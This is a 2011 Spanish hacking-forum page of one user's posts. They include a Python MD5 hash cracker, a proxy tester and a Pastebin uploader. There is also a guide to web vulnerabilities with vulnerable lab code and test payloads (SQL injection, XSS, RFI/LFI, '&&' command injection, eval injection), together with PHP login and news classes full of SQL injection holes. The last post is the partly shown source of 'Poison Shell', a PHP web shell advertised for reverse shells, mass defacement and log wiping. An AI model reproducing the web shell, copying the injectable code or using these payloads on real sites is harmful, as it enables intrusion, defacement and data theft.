Temas - BigBear - Página 9

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - BigBear

Páginas 1 ... 7 8 9 10

#321

Python / [Python] Simple Crack Hash

Julio 03, 2011, 09:55:03 PM

Un simple programa para crackear hashes md5

Código: python


#Simple Crack Hash 
#(C) DOddy Hackman 2011
#Test with 202cb962ac59075b964b07152d234b70:123

import urllib2,re,sys

nave = urllib2.build_opener(urllib2.HTTPCookieProcessor())	
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]


def head():
 print "\n\n== -- Crack Hash -- ==\n\n"

def copyright():
 print "\n\n(C) Doddy HAckman 2011\n"

def uso():
 print "\n[+] crackhash.py <hash>\n\n"

def crack(passw):
 print "\n[+] Cracking...\n\n" 
 code = toma("http://md5.hashcracking.com/search.php?md5="+passw)
 if re.findall("Cleartext of (.*) is (.*)",code):
  control = re.findall("Cleartext of (.*) is (.*)",code)
  print "[+] Password : "+control[0][1]
 else:
  print "\n[-] Not Found\n\n"
    
def toma(web):
 return nave.open(web).read()

head()

if len(sys.argv) == 2 : 
 crack(sys.argv[1])
else:
 uso()

copyright()

#322

Python / [Python] Proxy Tester

Julio 03, 2011, 09:54:48 PM

Un simple programa para testear proxies

Código: python


#!usr/bin/python
#Proxy Tester (C) Doddy Hackman 2011

import urllib2,sys


def toma(web) :
 return nave.open(web).read()

def header() : 
 print "\n\n--== Proxy Tester ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2011\n"
 sys.exit(1)

def sintax() :
 print "\n[*] Sintax : ",sys.argv[0]," <file>"

def testar(host):
 try:
  proxy = urllib2.ProxyHandler({"http":host})
  nave = urllib2.build_opener(proxy)
  nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
  urllib2.install_opener(nave)
  urllib2.urlopen("http://127.0.0.1/sql.php")#
  print "[+] Proxy Found : "+host
 except:
  pass

header()
if len(sys.argv) != 2 : 
 sintax()
else :
 print "\n[+] Opening file\n\n"
 try: 
  hosts = open(sys.argv[1], "r").readlines()
 except	:
  print "\n[-] Error opening file\n"
 for host in hosts:
  host = host.replace("\r","").replace("\n","")
  testar(host)
copyright()

#  The End

#323

Python / [Python] PasteBin Uploader

Julio 03, 2011, 09:54:33 PM

Un simple programa para subir codigos a pastebin

Código: python


#!usr/bin/python
#PasteBin Uploader (C) Doddy Hackman 2011

import urllib2,sys,re

nave = urllib2.build_opener()	
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]	

def tomar(web,vars) :
 return nave.open(web,vars).read()

def head():
 print "\n-- == PasteBin Uploader == --\n\n"

def copyright():
 print "\n(C) Doddy Hackman 2011\n"
 sys.exit(1)

def sintax():
 print "[+] paste.py <file> <title> <perl/python/ruby/php>\n"

def chubir(file,title,type):
 print "[+] Uploading file\n"
 try:
  lineas = open(file,"r").readlines()
 except:
  print "[-] Error open file\n"
  copyright()
 lin = "".join(lineas)
 try:
  code = tomar("http://pastebin.com/api_public.php","paste_code="+str(lin)+"&paste_name="+title+"&paste_format="+type+"&paste_expire_date=N&paste_private=public&submit=submit")
 except:
  print "[-] Page offline\n"
 if re.findall("Bad API request",code):
  print "[-] Error uploading file\n"
 else:
  print "[+] Enjoy : ",code+"\n"
  copyright()

head()
if len(sys.argv) != 4 : 
 sintax()
else :
 chubir(sys.argv[1],sys.argv[2],sys.argv[3])
copyright()



# The End

#324

Bugs y Exploits / [Guia] Vulnerabilidades a nivel web

Julio 03, 2011, 09:53:55 PM

[Guia] Vulnerabilidades a nivel web

[Titulo] : Vulnerabilidades a nivel web
[Autor] : Doddy Hackman

[Temario]

--===================================--

0x01 : Introduccion
0x02 : SQLI
0x03 : Blind SQLI
0x04 : HTML Injection
0x05 : XSS
0x06 : RFI
0x07 : LFI
0x08 : Remote code Execution
0x09 : Full Path Discloure
0x10 : Full Source Discloure
0x11 : PHP Injections

--===================================--

0x01 : Introduccion

Hola a todos.

Eh empezado a hacer esta simple guia donde detallo de forma minima las vulnerabilidades mas comunes
a nivel web , en cada vulnerabilidad solo explicare como se produce y como arreglarlo , pero
no voy a ampliar demasiado en tecnias de cada una
Cualquier error en la guia deben decirmelo para aprender de mis errores

0x02 : SQLI

Las injecciones SQL son una de las vulnerabilidades mas usadas debido a que es una de las faciles de explotar cuando estas
son encontradas.
La injecciones SQL se producen cuando se incluye en una sentencia SQL una variable que no esta filtrada , entonces
mediante la variable mal filtrada vamos a poder codigo que nos puedan ayudar
a sacar columnas , extraer tablas y columnas , datos y todo eso.........

Un ejemplo de este tipo de vulnerabilidad

Código: text


<title>LABS SQL INYECTION</title>

<STYLE type="text/css">

body {
background-color: #000000;
color:orange;
font-family:
Courier New;
cursor:crosshair;
font-size: small;
}
</style>

<center><h1><font color=green>LABS SQL INYECTION</font></h1><br><br><br>

<?php 

$host = 'localhost';
$user = 'root';
$datos = 'users';

$conexion = mysql_connect($host, $user);
mysql_select_db($datos,$conexion); 



if (isset($_GET['id'])) {
$id = $_GET['id'];
}

if(empty($id)){
$id = "1";
}

$sql = mysql_query("SELECT * FROM `hackers` WHERE id=".$id) or die (mysql_error());

$resultado = mysql_fetch_row($sql); 

echo "<h3><b>id: </font>".$resultado[0]."<br>";
echo "user: </font>".$resultado[1]."<br>";
echo "pass: </font>".$resultado[2]."</b></h3><br>"; 

mysql_close($conexion); 

?>

Como ven , la funcion mysql_query() usa un sentencia que posee la variable $id , como la variable
$id no esta filtrada o protegida , se puede insertar codigo de la siguiente manera

Código: text


http://127.0.0.1/sql.php?id= ¿AQUI?

A partir del id podemos poner el codigo para ver si es vulnerable o no porque id es la variable mal
filtrada

Para saber si es vulnerable podemos poner un ' en el contenido de id

Si el resultado de la pagina es algo como mysql error bla bla

Es porque es vulnerable

Una forma de protegerse de este ataque es verificar que $id sea un numero y no codigo raro para modificar
la sentencia SQL

Código: text



if (!is_numeric($_GET['id'])) {
echo "no me jodas !!!<br>";
exit(1);
}

Como vemos usamos is_numeric para la verificacion , pero usamos este para verificar que si $id no es un numero , este nos avise y
nos diga no me jodas !!!

0x03 : Blind SQLI

Las Blind SQLI vienen de la misma vulnerabilidad que las SQLI , pero en este caso el admin
usa @ en las funciones para la conexion con la DB o error_reporting en 0 para que
no tire errores. Un grave error pues asi esta provocando las conocidas Blind SQLI

Un ejemplo de pagina vulnerable seria este

Código: text


<title>LABS SQL INYECTION</title>

<STYLE type="text/css">

body {
background-color: #000000;
color:orange;
font-family:
Courier New;
cursor:crosshair;
font-size: small;
}
</style>

<center><h1><font color=green>LABS SQL INYECTION</font></h1><br><br><br>

<?php 

$host = 'localhost';
$user = 'root';
$datos = 'hackman';

$conexion = mysql_connect($host, $user,"123");
mysql_select_db($datos,$conexion); 



if (isset($_GET['id'])) {
$id = $_GET['id'];
}

if(empty($id)){
$id = "1";
}

$sql = @mysql_query("SELECT * FROM `hackers` WHERE id=".$id);

$resultado = @mysql_fetch_row($sql); 

echo "<h3><b>id: </font>".$resultado[0]."<br>";
echo "user: </font>".$resultado[1]."<br>";
echo "pass: </font>".$resultado[2]."</b></h3><br>"; 

mysql_close($conexion); 

?>

como ven usamos @ para evitar errores las funciones mysql_query() y mysql_fetch_row()

Entonces para comprobar que si la pagina es vulnerable a Blind SQLI podemos poner asi en
la parte de id

Código: text


http://127.0.0.1/sql.php?id=1+and+1=1

Código: text


http://127.0.0.1/sql.php?id=1+and+1=0

Si en el primer link devuelve un resultado positivo y en el segundo negativo (no muestra nada)

Una forma de arreglar esta vulnerabilidad seria la misma que la de SQLI

Código: text



if (!is_numeric($_GET['id'])) {
echo "no me jodas !!!<br>";
exit(1);
}

0x04 : HTML Injection

Las HTML Injection son conocidas como las vulnerabilidades mas idiotas y faciles de hacer , pero
, ¿los que dicen eso saben como se produce y como se arregla ? ,de ese estoy seguro que no .

Esta vulnerabilidad se produce normalmente en los libros de visitas cuando se deja un comentario y
se lo muestra en pantalla

Un ejemplo seria este

Código: text



<?php 

echo "

<form action='' method=POST>
<input type=text name=mensaje>
<input type=submit value=Mostrar>
</form>

";

if (isset($_POST['mensaje'])) {
echo $_POST['mensaje'];
}

?>

Si queremos probar si la pagina padece de esta vulnerabilidad solo tendriamos que poner algo de
codigo html

Si ponemos "<h1>hola</h1>" y se muestra como tal es porque es vulnerable

La forma de protegerse es facil solo filtras las variables para protegerse

Para hacer esto podemos usar htmlentities() o htmlspecialchars() , usen la que quieran pues las
dos protegen

Código: text



<?php 

echo "

<form action='' method=POST>
<input type=text name=mensaje>
<input type=submit value=Mostrar>
</form>

";

if (isset($_POST['mensaje'])) {

echo htmlentites($_POST['mensaje']);
}

?>

0x05 : XSS

Bueno , XSS es una vulnerabilidad conocida y util a la hora de robar cookies , la vulnerabilidad se
produce cuando se muestra una variable mal filtrada

Código: text



<?php 

echo "

<form action='' method=GET>
<input type=text name=msg>
<input type=submit value=Mostrar>
</form>

";

if (isset($_GET['msg'])) {

echo $_GET['msg'];
}

?>

Para ver si es vulnerable podemos ejecutar el siguiente link con el siguiente codigo

Código: text


<script>alert("hola");</script>

Código: text


http://127.0.0.1/xss.php?msg=<script>alert("hola");</script>

Como ven la variable msg es enviada por metodo GET , la variable no es protegida y es
mostrada tal cual

Una forma de reparar es usar como htmlentities() o htmlspecialchars()

Código: text


<?php 

echo "

<form action='' method=GET>
<input type=text name=msg>
<input type=submit value=Mostrar>
</form>

";

if (isset($_GET['msg'])) {

echo htmlspecialchars($_GET['msg']);
}

?>

0x06 : RFI

Bueno , el viejo RFI , esta vulnerablidad es muy conocida , se trata de un mal uso de la funcion
include() y una mala configuracion de la variable allow_url_include estando On en php.ini

Un ejemplo seria este

Código: text


<?php 

if (isset($_GET['car'])) {
include($_GET['car']);	
}

?>

Como ven , si queremos saber si la pagina es vulnerable a RFI podemos hacer asi

Código: text


http://127.0.0.1/rfi.php?car=http://www.google.com.ar

Y si la pagina muestra la pagina de google es porque la pagina es vulnerable a RFI

Una forma de protegerse RFi seria usando un control en la variable "car" de la siguiente forma

Código: text



if (isset($_GET['car'])) {

if ($_GET['car'] == "veo") {
include("veo.php");
}

elseif($_GET['car'] == "noveo") {
include("noveo.php");
}
else {
echo "no intentes cosas raras xDDD";
}
}

0x07 : LFI

Bueno , el conocido LFI ,es parecido a RFI , pero este solo ejecuta archivos a nivel local y no remoto como RFI

Un ejemplo de pagina vulnerable seria asi

Código: text


<?php 

if (isset($_GET['car'])) {
include($_GET['car']);	
}

?>

Para saber si es vulnerable podemos cargar la variable car con un ' de la siguiente manera

Código: text


http://127.0.0.1/lfi.php?car='

Y si nos devuelve algo asi

Código: text


Warning: include(') [function.include]: failed to open stream: No such file or directory in C:\xampp\htdocs\666.php on line 4

Es porque es vulnerable xDDD

Para protegernos de esta vulnerabilidad seria de la misma forma que RFI

Código: text



if (isset($_GET['car'])) {

if ($_GET['car'] == "veo") {
include("veo.php");
}

elseif($_GET['car'] == "noveo") {
include("noveo.php");
}
else {
echo "no intentes cosas raras xDDD";
}
}

0x08 : Remote code Execution

Esta vulnerabilidad no es muy conocida , se trata de poder ejecutar comandos en la maquina atacada
sin necesidad de crear una shell.

Entonces un ejemplo de pagina vulnerable seria esta.

Código: text


<?php

echo "

<form action='' method=POST
<input type=text name=cmd>
<input type=submit value=mandar>
</form>

";

if (isset($_POST['cmd'])) {
system("ping ".$_POST['cmd']);
}



?>

Como ven la pagina hace un comando ping con system() a la ip marcada por ustedes

Entonces que pasa si ponemos una ip cualquiera

Pues nada solo hace un ping a la ip que pusieron

Entonces si ponemos esto

Código: text


ip && ver

El servidor nos devolveria el resultado de el comando ping con un extra xDDD
Pues si estamos viendo la version del SO
Entonces la explicacion es simple solo ponemos && para agregar un comando siempre cuando la ip
que pusieron anteriormente era real y el ping se mostro correctamente

Entonces si queremos arreglar esta vulnerabilidad tenemos que reemplazar toda cosa rara en la variable
de "cmd"

Quedando el codigo de la siguiente manera

Código: text


<?php

echo "

<form action='' method=POST
<input type=text name=cmd>
<input type=submit value=mandar>
</form>

";

if (isset($_POST['cmd'])) {

$cmd = $_POST['cmd'];

$cmd = str_replace("&&", "", $cmd);
$cmd = str_replace(";", "", $cmd);
$cmd = str_replace("-", "", $cmd);
$cmd = str_replace("?", "", $cmd);
$cmd = str_replace("||", "", $cmd);
$cmd = str_replace("|", "", $cmd);
$cmd = stripslashes($cmd);

system("ping ".$cmd);

}



?>

0x09 : Full Path Discloure

Esta vulnerabilidad se produce cuando se produce un error , tanto como un error en el resultado de la funcion que estamos
usando como la sintasis usada en la misma

Un ejemplo seria este

Código: text


<?php
if (isset("no se nada de php")) {

}
?>

Que feo programo xDDD

Entonces el error que nos devuelve seria este

Código: text


Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in C:\xampp\htdocs\666.php on line 2

Como vemos nos devuelve el directorio actual donde se ejecuta el archivo php , esto es lo que se llama
full path discloure

Esta vulnerabilidad tambien aparece en SQL y LFI , cuando poniamos la comilla ' el resultado de include() y mysql_query()
En el caso del segundo era una full path discloure ademas de estar indicando que la pagina realmente era vulnerable a SQL
En el caso del primero tambien se debia al mal uso de la funcion include() devolviendonos un error con un full path
discloure

0x10 : Full Source Discloure

Bueno , esta vulnerabilidad nos permite descargar archivos de un servidor web debido a que no
filtra las variables

Un ejemplo seria este

Código: text



if (isset($_GET['down'])) {
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($_GET['down']));
readfile($_GET['down']);
}

Entonces si ponemos la ruta que queremos en la variable "down" estamos hecho.
Un ejemplo de uso seria este

Código: text


http://127.0.0.1/down.php?down=c:/secretos.txt

Y con eso descargariamos el archivo secreto si es que existe xDDD

Entonces una forma de evitar esta vulnerabilidad seria usando una DB , que contenga una tabla
con los links de descarga , entonces una vez que se detecte la variable down se verificaria que fuera
un numero de lo contrario chau xDDD

0x11 : PHP Injections

Bueno , la php injections suelen suceder cuando usa la funcion eval().
La funcion eval() nos permite ejecutar codigo php

Un ejemplo de esta vulnerabildad seria este

Código: text


<?php

if (isset($_GET['te'])) {
eval($_GET['te']);
}

?>

Como ven , es un caso muy raro y especial en cierto sentido xDDD

Entonces si ejecutamos este link

Código: text


http://127.0.0.1/php?te=echo "hola mundo";

Si vemos en la pantalla , este link nos devuelve hola mundo , creo que es obvio que es vulnerable

Una forma de protegerse seria no usar eval()

--========--
¿ The End ?
--========--

#325

Back-end / [PHP Class] Get Info By Doddy H

Julio 03, 2011, 09:52:48 PM

Bueno , esto no es nada del otro mundo , solo una simple clase que te da informacion sobre el visitante

Código: php


<?php 

/*

Simple Class GetInfo

By Doddy Hackman

*/


class getinfo {


public function ip() {
return htmlentities($_SERVER['SERVER_ADDR']);
}

public function navegador() {

$navegador = get_browser($_SERVER['HTTP_USER_AGENT'], true);
return array(htmlentities($navegador['browser']),htmlentities($navegador['version']));
}

public function so() {

$navegador = get_browser($_SERVER['HTTP_USER_AGENT'], true);
return htmlentities($navegador['platform']);

}
}

?>

Funciones

Código: text


ip() // Te da la IP
navegador() // Te da el navegador
so() // te da el SO

#326

Back-end / [PHP Class] Loginow 0.2 By Doddy H

Julio 03, 2011, 09:52:37 PM

Hola a todos.

Acabo de hacer mi primer clase en PHP , esta sirve
para realizar logins a webs con las sig opciones

* extrae valores del formulario para realizar la verificacion
* login mediante DB
* login mediante una contraseña md5 marcada por ustedes
* Si el login es exitoso crea una cookie

No eh alcando a probarla hasta fondo
Pero aca tienen un ejemplo de como usarla

test.php

Código: php



include_once("loginow.php"); 

if (isset($_POST['mandar'])) {
$nave = new loginow;
$nave->campos("usuario","password");
//if ($nave->secure("admin","098f6bcd4621d373cade4e832627b4f6")) {
if ($nave->database("localhost","root","","hackman","hackers","usuario","password")) {
$nave->cookienow("login");
echo "login correcto";
} else {
echo "Error en el login";
exit(1);
}
} else {
echo "
<form action='' method=POST>
Usuario : <input type=text name=usuario value=admin><br>
Password : <input type=text name=password value=test><br>
<input type=submit name=mandar value=mandar></form>";
}

Como ven usamos las funciones

campos(); # ponemos los nombres de las casillas user y pass para realizar la verificacion
secure(); #establecemos esta funcion para verificar mediante user y pass establecidos por nosotros
database(); #ponemos los datos de la DB y sus columnas para realizar la verificacion , claro la clase solo se basara en el primer casillero

loginow.php

Código: php


<?php

/*

Simple Class for login of the webs

(c) DOddy Hackman 2010


*/

class loginow {

private $host;
private $db;
private $user;
private $pass;
private $tabla;
private $columna1;
private $columna2;
private $usereal;	
private $passreal;
private $campouser;
private $campopass;
private $cookiename;

public 	function campos($campouser,$campopass) {
if (isset($_POST[$campouser])) {
$this->campouser = $_POST[$campouser];
$this->campopass = md5($_POST[$campopass]);
} else {
$this->campouser = $campouser;
$this->campopass = $campopass;
}
}

public function database($host,$dbuser,$dbpass,$db,$tabla,$columna1,$columna2) {
mysql_connect($host,$dbuser,$dbpass);
mysql_select_db($db);
$que = mysql_query("SELECT * FROM ".$tabla);
while ($test = mysql_fetch_array($que)) {
if ($this->campouser == $test[$columna1] and $this->campopass == $test[password]) {
$this->usereal = $test[$columna1];
$this->passreal = $test[$columna2];
return true;
}
}
}

public function secure($user,$pass) { 
if ($this->campouser == $user and $this->campopass == $pass) {
$this->usereal = $user;
$this->passreal = $pass;
return true;
} else {
return false;
}
}

public function cookienow($cookiename) {
setcookie($cookiename,base64_encode($this->usereal."@".$this->passreal));	
}

}

?>

Caulquier mejora , fallo o vulnerabilidad encontrada deben decirmelo para mejorar

#327

Back-end / [PHP Class] Noticion 0.9

Julio 03, 2011, 09:52:20 PM

Bueno , en esta version le quite esa opcion de usar bases de datos que era innecesaria debido que
no se puede tener varias , gran error mio pero gracias por decirmelo , en esta version le quite algunas cosas
que no hacian falta y modifique el uso de bases de datos por tablas

Para realizar la conexion usamos

Código: php


datos($host,$user,$pass,$db)

Para crear una nueva categoria usamos

Código: php


crearcategoria($nuevacategoria)

Para borrar una categoria usamos

Código: php


eliminarcategoria($eliminarcategoria)

Para devolver un array con todas las categorias disponibles usamos

Código: php


listarcategorias()

Para crear una nueva noticia usamos

Código: php


nuevo($x_titulo,$x_contenido,$x_fecha,$categoria)

Para modificar el contenido usamos

Código: php


mod($categoria,$id,$tit,$con,$fech)

Para borrar una noticia usamos

Código: php


eliminar($id,$categoria)

Para poder ver el contenido de una noticia usamos

Código: php


vereste($id,$categoria)

Para recibir una lista de todas las noticias usamos

Código: php


vertodo($categoria)

Para crear un comentario usamos

Código: php


crearcomentario($categoria,$id_noticia,$fecha,$apodo,$mensaje)

Para modificar el contenido de un comentario usamos

Código: php


modcomentario($categoria,$id,$fecha,$apodo,$contenido)

Para ver el contenido de un comentario usamos

Código: php


vercomentarios($categoria,$id)

Para borrar un comentario

Código: php


borrarcomentario($categoria,$id)

Para cerrar la conexion con el servidor mysql usamos

Código: php


close()

Código: php


<?php

/*

Noticion 0.9

(c) DOddy Hackman 2011

*/


class noticion {

private $db;

public function datos($host,$user,$pass,$db) {

$this->db = $db;

if (@mysql_connect($host,$user,$pass)) {
if (@mysql_select_db($db)) {
return true;
}
}
}

public function crearcategoria($nuevacategoria) {

$todo1 = "create table categoria_$nuevacategoria (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
titulo VARCHAR(255) NOT NULL,
contenido TEXT NOT NULL,
fecha VARCHAR(255) NOT NULL,
PRIMARY KEY (id));
";

$todo2 = "create table comentarios_$nuevacategoria (
id_noticia int(10),
id_comentario int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
apodo VARCHAR(255) NOT NULL,
fecha VARCHAR(255) NOT NULL,
PRIMARY KEY (id_comentario));
";

if (@mysql_query($todo1)) {
if (@mysql_query($todo2)) {
return true;
}
}
 
}

public function eliminarcategoria($eliminarcategoria) {

if (@mysql_query("DROP TABLE categoria_$eliminarcategoria")) {
if (@mysql_query("DROP TABLE comentarios_$eliminarcategoria")) {
return true;
}

}
}


public function eliminar($id,$categoria) {
if (is_numeric($id)) {
if (@mysql_query("DELETE FROM categoria_$categoria where id='$id'")) {
return true;
}
}
}

public function nuevo($x_titulo,$x_contenido,$x_fecha,$categoria) {
$sumo = mysql_query("SELECT MAX(id) FROM categoria_$categoria");

$s = mysql_fetch_row($sumo);

foreach ($s as $d) {
$x_id = $d+1;
}
if (@mysql_query("INSERT INTO categoria_$categoria(id,titulo,contenido,fecha)values('$x_id','$x_titulo','$x_contenido','$x_fecha')")) {
return true; 
}
}

public function vereste($id,$categoria) {
if (is_numeric($id)) {
$total = array();
if ($que = @mysql_query("SELECT id,titulo,contenido,fecha FROM categoria_$categoria WHERE id='$id'")) {
while ($ver = @mysql_fetch_array($que)) {
return array($ver[0],$ver[1],$ver[2],$ver[3]);
}
}
}
}

public function listarcategorias() {

$found = array();

if ($re = @mysql_query("show tables from ".$this->db)) {

while($dat = mysql_fetch_row($re)) {
$separo = split("_",$dat[0]);
array_push($found,$separo[1]);
}
return array($found);
}

}

public function vertodo($categoria) {
$total = array();
if ($que = @mysql_query("SELECT id,titulo,contenido,fecha FROM categoria_$categoria")) {
while ($ver = @mysql_fetch_array($que)) {
array_push($total,$ver);
}
return array($total);
}
}

public function mod($categoria,$id,$tit,$con,$fech) {
if (@mysql_query("UPDATE categoria_$categoria SET id='$id',titulo='$tit',contenido='$con',fecha='$fech' where id='$id'")) {
return true; 
}
}

public function crearcomentario($categoria,$id_noticia,$fecha,$apodo,$mensaje) {

$sumo = mysql_query("SELECT MAX(id_comentario) FROM comentarios_$categoria");

$s = mysql_fetch_row($sumo);

foreach ($s as $d) {
$x_id = $d+1;
}

if (mysql_query("INSERT INTO comentarios_$categoria(fecha,apodo,mensaje,id_noticia,id_comentario)values('$fecha','$apodo','$mensaje','$id_noticia','$x_id')")) {
return true;
}

}	

public function modcomentario($categoria,$id,$fecha,$apodo,$contenido) {
if (@mysql_query("UPDATE comentarios_$categoria SET id_comentario='$id',fecha='$fecha',apodo='$apodo',mensaje='$contenido' where id_comentario='$id'")) {
return true;
}
}

public function vercomentarios($categoria,$id) {
$todo = array();
if ($ver = @mysql_query("SELECT id_noticia,id_comentario,apodo,mensaje,fecha FROM comentarios_$categoria")) {
while ($que = @mysql_fetch_array($ver)) {
if ($que[0] == 1) {
array_push($todo,$que);
}
}
return array($todo);
}

}


public function borrarcomentario($categoria,$id) {
if (is_numeric($id)) {
if (@mysql_query("DELETE FROM comentarios_$categoria where id_comentario='$id'")) {
return true;
}
}
}

	
public function close() {
$test->close;
}


}

?>

Ejemplos de usos

Código: php


<?php

include_once("noticion.php");	

$name = New noticion;

if ($name->datos("localhost","root","","test")) {
echo "conexion abierta<br>";

//$name->crearcategoria("py");

//if ($name->borrarcomentario("perl","1")) {
//echo "ok";
//}


//$name->modcomentario("perl","2","a","a","a");

list($recibo) = $name->vercomentarios("perl","1");

echo count($recibo)."<BR><BR>";

foreach($recibo as $a) {
echo $a[2]."<br>";
}


//$name->crearcomentario("perl","1","1","1","1");


//if ($name->nuevo("aa","aa","aa","perl")) {
//echo "ok";
//}

//$ver = $name->vereste("1","perl");

//echo $ver[0];
	
//$name->mod("perl","3","cambie","cambie","cambie");

//$re = $name->listarcategorias();

//$name->eliminar("5","perl");


//list($re) = $name->vertodo("perl");

//foreach ($re as $r) {
//echo $r[0]."<br>";
//echo $r[1]."<br><br>";
//}


//$name->crearcategoria("perl");

//foreach($t as $veo) {
//echo $veo[id]."<br>";
//}

$name->eliminarcategoria("py");
}

Culquier error , vulnerabilidad o mejorar deben decirlas para mejorar esta clase

#328

Back-end / [PHP Shell] Poison Shell 0.7

Julio 03, 2011, 09:52:02 PM

Hola a todos , hoy eh terminado la version 0.7 de mi shell llamada poison shell
Esta shell tiene las siguientes opciones

Informacion : sobre el servido web
Navegacion de archivos y directorios :

* En esta opcion pueden editar , borrar ,renombrar y descargar archivos
* Tambien podes crear directorios nuevos
Ejecutar comandos
Subir archivos a un directorio especifico
Base64 encode() decode()
Ejecutar codigo php con eval()
Cargar phpinfo()
Crackear hash md5 con salto o sin salto
BackShell : en esta version solo esta un reverse shell en perl hecho por mi
MassDefacement : masivo deface a un directorio y todos sus subdirectorios que le sigan
CleanLogs : limpia logs de linux
FTP

* Crear directorios nuevos
* Este cliente FTP permite navegar a traves de los directorios y archivos
* Borrar archivos
* Cambiar permisos de archivos
* Descargar archivos
SQL Manager

* Podes navegar a traves de la base datos podiendo ver todas
las bases de datos y tablas activas
* Ejecutar sentencias SQL
* Descargar tablas
* Descargar bases de datos
Cookies Manager

* En esta opcion podemos ver todos los cookies activos
* Podemos crear un cookie con el valor que queremos
Session Manager

* En esta opcion podemos ver todas las sesiones activas
* Podemos crear una sesion con el valor que queremos
Shell Protegida con user y pass

Autodestruccion de la shell

El codigo de la shell es el siguiente

Código: text


<?php

/*

Poison Shell 0.7


Doddy Hackman (C) Doddy Hackman


Mail : lepuke[at]hotmail[com]
Blog : doddy-hackman.blogspot.com

*/

@session_start();

$username = "a";
$password = "a";

if (isset($_POST['user'])) {
if ($_POST['user'] == $username && $_POST['pass'] == $password) {
$_SESSION['loginh'] = "1";
}
}

if (isset($_GET['chaunow'])) {
@session_destroy();
}

if ($_SESSION['loginh'] == 1) {

if (isset($_GET['info'])) {
die(phpinfo());
}

if (isset($_POST['sessionew'])) {
@session_start();
if ($_SESSION[$_POST['sessionew']] = $_POST['valor']) {
echo "<script>alert('Session created');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}


if(isset($_GET['bajardb'])) {

$tod = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']); 
mysql_select_db($_GET['bajardb']);

$resultado = mysql_query("SHOW TABLES FROM ".$_GET['bajardb']);
	
while ($tabla = mysql_fetch_row($resultado)) {
foreach($tabla as $indice => $valor) {

$todo.= "<br><br>".$valor."<br><br>";

$resultadox = mysql_query("SELECT * FROM ".$valor);

$todo.="<table border=1>";

for ($i=0;$i< mysql_num_fields($resultadox);$i++) {
$todo.="<th>".mysql_field_name($resultadox,$i)."</th>";
}
while($dat = mysql_fetch_row($resultadox)) {
$todo.="<tr>";
foreach($dat as $val) {
$todo.="<td >".$val."</td>";
}
}
$todo.="</tr></table>";
}	
}
@mysql_free_result($tod);
@header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");
@header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");
echo $todo;  
exit(1);
}




if(isset($_GET['bajartabla'])) {
$tod = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");
mysql_select_db($_GET['condb']);
if(!empty($_GET['sentencia'])) {
$resultado =  mysql_query($_GET['sentencia']);
} else {
$resultado = mysql_query("SELECT * FROM ".$_GET['bajartabla']);
}
$todo.="<table border=1>";
for ($i=0;$i< mysql_num_fields($resultado);$i++) {
$todo.="<th>".mysql_field_name($resultado,$i)."</th>";
}
while($dat = mysql_fetch_row($resultado)) {
$todo.="<tr>";
foreach($dat as $val) {
$todo.="<td>".$val."</td>";
}
}
@mysql_free_result($tod);
$todo.="</tr></table>";
@header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");
@header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");
echo $todo;  
exit(1);
}

if (isset($_GET['reload'])) {
$tipo = pathinfo($_GET['reload']);
echo '<meta http-equiv="refresh" content="0;URL=?dir='.$tipo['dirname'].'>';
exit(1);
}

function dame($file) {
return substr(sprintf('%o', fileperms($file)), -4);
}

if (isset($_GET['down'])) {
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($_GET['down']));
readfile($_GET['down']);
}

if (isset($_POST['cookienew'])) {
if (setcookie($_POST['cookienew'],$_POST['valor'])) {
echo "<script>alert('Cookie cREATED');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?cookiemanager">';
} else {
echo "<script>alert('Error');</script>";
}
}


echo '<style type="text/css">


.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: #00FF00;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00; 
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>';

echo "<title>[+] PoisonShell (C) Doddy Hackman 2011 </title>";
echo "<table><tr><td class=main><br><h2>&nbsp;&nbsp;&nbsp;PoisonShell&nbsp;&nbsp;&nbsp;</h2><br></td><td class=main>
<b>System</b> : ".php_uname('s')." ".php_uname('r')." ".php_uname('v')."<br><b>Server</b> : ".$_SERVER['SERVER_SOFTWARE']."<br>";
echo "<b>IP</b> : ".$_SERVER['SERVER_ADDR']."&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b>User</b> : uid=".getmyuid()." (".get_current_user().") gid=".getmygid()."&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b>Path</b> : ".getcwd()."&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b>Version PHP</b> : ".phpversion()."<br>";
if (ini_get('safe_mode')==0) {
echo "<b>Safe Mode</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";	
} else {
